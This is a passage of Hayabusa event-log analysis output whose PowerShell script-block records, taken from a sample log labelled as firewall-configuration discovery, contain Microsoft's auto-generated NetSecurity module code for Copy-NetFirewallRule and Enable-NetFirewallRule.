-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') 
-contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 